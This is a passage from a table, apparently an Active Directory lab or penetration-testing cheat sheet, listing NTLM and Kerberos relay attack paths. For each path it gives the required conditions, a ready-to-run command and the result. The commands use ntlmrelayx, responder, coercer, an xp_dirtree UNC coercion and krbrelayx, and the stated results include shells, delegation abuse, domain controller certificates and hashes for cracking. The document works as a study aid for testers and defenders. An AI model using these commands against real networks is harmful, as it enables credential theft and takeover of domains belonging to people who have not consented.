| NTLM to SMB | User or machine NTLM | SMB on workstation or server | SMB signing not required and relayed identity is local admin | ntlmrelayx.py -t smb://target.ootw.local -smb2support -i | Interactive SMB shell or command execution |
| NTLM to LDAP | User or machine NTLM | LDAP or LDAPS on DC | LDAP signing or channel binding not blocking relay, plus useful write rights | ntlmrelayx.py -t ldaps://dc01.ootw.local --delegate-access --escalate-user 'ATTACKER01$' -smb2support | RBCD, shadow credentials, add computer, ACL change |
| NTLM to ADCS | User or machine NTLM | ADCS web enrollment | Web enrollment relayable and template enrollment allowed | ntlmrelayx.py -t http://ca.ootw.local/certsrv/certfnsh.asp --adcs --template DomainController -smb2support | PFX certificate for relayed principal |
| NTLM capture only | User or machine NTLM | Attacker listener | Victim connects to attacker-controlled name or UNC | responder -I eth0 | NetNTLMv2 hash for cracking |
| Poisoning to relay | LLMNR, NBT-NS, mDNS, WPAD | SMB, LDAP, ADCS, HTTP | Name resolution poisoning succeeds and target accepts relay | ntlmrelayx.py -tf targets.txt -smb2support | Automatic relay when poisoned clients authenticate |
| Coercion to relay | Forced machine or service auth | SMB, LDAP, ADCS | Coercion primitive works and target accepts relay | coercer -d ootw.local -u student -p 'student' --target 10.10.10.200 --listener 10.10.10.100 | Machine account relay |
| MSSQL UNC coercion to relay | SQL service account NTLM | SMB target or capture listener | SQL function can access UNC path | EXEC master..xp_dirtree '\\10.10.10.100\share',1,1 | SQL service account authentication |
| Kerberos relay | Kerberos AP-REQ | LDAP, HTTP, SMB, service-specific | Service validation or binding weakness | krbrelayx.py | LDAP modification, ticket or service access depending on setup |